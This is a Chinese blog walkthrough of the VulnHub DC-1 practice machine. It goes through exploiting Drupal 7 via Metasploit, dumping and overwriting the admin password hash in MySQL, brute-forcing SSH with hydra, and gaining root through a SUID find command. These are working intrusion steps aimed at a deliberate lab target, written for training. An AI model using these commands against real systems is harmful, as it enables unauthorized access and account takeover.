vulnhub之DC1靶机

最新推荐文章于 2024-05-17 01:12:56 发布
最新推荐文章于 2024-05-17 01:12:56 发布
阅读量1.2k 收藏 13
点赞数 1
分类专栏: 靶机 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/108027062
版权

文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

在这里插入图片描述

靶机概览

详情介绍请参考下载地址
任务目标:拿下5个flag
下载地址:https://www.vulnhub.com/entry/dc-1,292/
靶机界面:
在这里插入图片描述

信息收集

由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC1的MAC,这样做主机发现时可以通过MAC来过滤靶机。
在这里插入图片描述

nmap信息收集

1:使用nmap作网段的主机发现,确定靶机地址是192.168.40.136
在这里插入图片描述
2:继续使用nmap对靶机做进一步探测
看这样子,还是先去80端口看看吧,不出意外的话,应该是先打80,再爆破22
在这里插入图片描述

网站信息收集

首先看到网站长这个样子
在这里插入图片描述
看到“Drupal Site”基本上就有思路了。

国外三大开源php CMS
drupal        【无专用扫描器,但是msf内置了模块】
wordpress     【有专用扫描器】
joomla        【有专用扫描器】

使用nikto来收集一下

看到Drupal的版本是7.x
在这里插入图片描述
很友好,直接给出了msf,那就来吧在这里插入图片描述

渗透攻击

随意选择一个模块
在这里插入图片描述

查看一下info信息,这和模块适合7.X
在这里插入图片描述
在这里插入图片描述

getshell

已经看到第一个flag了

在这里插入图片描述

Flag1

我们被告知要去找网站的配置文件
在这里插入图片描述

Flag2

在这里插入图片描述

再往下面看,会发现有一些和数据库相关的内容
在这里插入图片描述

进入数据库

首先需要进入shell,然后确认一下端口,看数据库开了没。然后进看到3306端口开了
在这里插入图片描述
这个时候需要注意,不能直接msf进入,因为msf是从web服务打进去的,而HTTP是瞬时协议,需要让python来做一个中介。
交互式shell

交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
或者
python -c 'import pty; pty.spawn("/bin/bash")'

有了python中介,进入数据库,就是这么神奇
在这里插入图片描述
按照拿下flag2时的提示,进入drupaldb
在这里插入图片描述
表的最后有一张users表,查看一下
在这里插入图片描述

*************************** 1. row ***************************
             uid: 0
            name:
            pass:
            mail:
           theme:
       signature:
signature_format: NULL
         created: 0
          access: 0
           login: 0
          status: 0
        timezone: NULL
        language:
         picture: 0
            init:
            data: NULL
*************************** 2. row ***************************
             uid: 1
            name: admin
            pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
            mail: admin@example.com
           theme:
       signature:
signature_format: NULL
         created: 1550581826
          access: 1550583852
           login: 1550582362
          status: 1
        timezone: Australia/Melbourne
        language:
         picture: 0
            init: admin@example.com
            data: b:0;
*************************** 3. row ***************************
             uid: 2
            name: Fred
            pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
            mail: fred@example.org
           theme:
       signature:
signature_format: filtered_html
         created: 1550581952
          access: 1550582225
           login: 1550582225
          status: 1
        timezone: Australia/Melbourne
        language:
         picture: 0
            init: fred@example.org
            data: b:0;
3 rows in set (0.00 sec)

拿下数据库的root账号

破解root的密码的密文不容易,尝试覆盖root的密码
1:现在生成一个密码,明文为alice

php scripts/password-hash.sh alice

在这里插入图片描述
2:进入数据库
输入如下命令

update users set pass="$S$DT7skRNNPHGv673OYXvY9YecYrhUL1GX5ikaJKTZ2zvynIc9erSU" where uid=1;

在这里插入图片描述
3:root的账密现在已经有了admin:alice

登录网站

在这里插入图片描述
随便点点
在这里插入图片描述

Flag3

拿下flag3,此时页面上线索指向了passwd,应该是/etc/passwd
在这里插入图片描述

Flag4

msf端的shell退出数据库,去看看/etc/passwd
在这里插入图片描述
到此为止,线索似乎断了。再回想一下,现在flag4是一个用户,而靶机开放了80和22端口,所以可以考虑爆破ssh了,就以flag4的身份

爆破ssh

使用hydra做ssh爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.40.136 ssh -vV -f

爆出账密是flag4:orange
在这里插入图片描述
使用ssh登录系统

Flag4

flag4暗示可以使用相同的方法拿下root
在这里插入图片描述
所以现在的路线就是要看一看root的家目录,那里应该有最后一个flag,即:要提权了

提权

探测SUIDsudo -l,结果发现find就有SUID,得来全不费工夫
在这里插入图片描述

find -exec "/bin/sh" \;

在这里插入图片描述

Flag5

在这里插入图片描述

lainwith
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
vulnhub DC-1 靶机
FourthGuy的博客
05-03 582
打开我们的kali linux 和 DC-1 靶机 信息收集 扫描靶机ip: arp-scan -l 查看网段的所有主机 由上图得到DC-1靶机ip为192.168.88.129 nmap端口扫描:接下来就要用我们的神器nmap了 (端口:如果我们把ip看成是一个房子,端口就是门,我们需要通过端口来从ip这里获取,传输数据) ...
靶机DC-1 WP
m0_66638011的博客
05-11 1596
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7821
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub靶场实战系列-DC-1实战
最新发布
weixin_45221204的博客
05-17 1089
DC-1靶场中,使用了metaspolit的基础操作,获取到了CMS的关键配置文件,然后对靶机数据库中admin用户的passwd进行修改,在网站后台获取到了关键信息,最后进行了find提权,并获得所有的flag
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7447
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装包
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4458
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
Vulnhub靶机DC-1(suid find提权)
过期的秋刀鱼
08-03 415
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
DC1_map_airtrafficcontrol_
10-02
"DC1_map_airtrafficcontrol_" 这个标题暗示我们正在处理一个与空管相关的项目,该项目可能涉及计算特定的指标——Map值,并通过用户界面(UI)展示这些数据。Map在这里指的是监控扇区告警参数,它对于评估和优化...
海尔智能电视刷机数据 LE37A320 机编DC1EF000001-03 务必确认机编一致 强制刷机 整机USB升级主程序
02-28
务必确认机身编号与文件名机编一致,如不一致,请勿下载 机身编号一般在机子背面的贴纸上 升级方法: 1、下载数据,压缩包解压,将“target”文件夹(注意是文件夹)整个拷贝到U盘根目录下(U盘要求使用FAT32格式,...
DC-1靶机渗透
weixin_45349299的博客
01-03 317
title: DC-1靶机渗透详解tags: DC系列靶机categories: 学习笔记。
dc-1靶机
qq_63267612的博客
09-28 1266
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf。
DC-1靶场详解
苏生要努力
03-12 2802
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1082
dc-1靶机详细获取flag过程新手勿喷
DC1-靶机详解
TonyChaoWei的博客
02-06 1755
DC系列靶机渗透实战 提权
DC-1靶机学习
qq_43711254的博客
11-09 879
DC靶机的练习过程,如有错误请各位大佬及时指出
靶机DC-1攻略
weixin_43179779的博客
10-07 1123
dc-1靶机靶机攻略
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标机器上正确添加了反弹shell的代码,并将其放置在适当的位置,比如backups.sh文件中。最后,您需要等待计划任务执行反弹shell的代码。如果仍然无法成功反弹shell,请检查您的代码和配置是否正确,并确保您有足够的权限执行这些操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值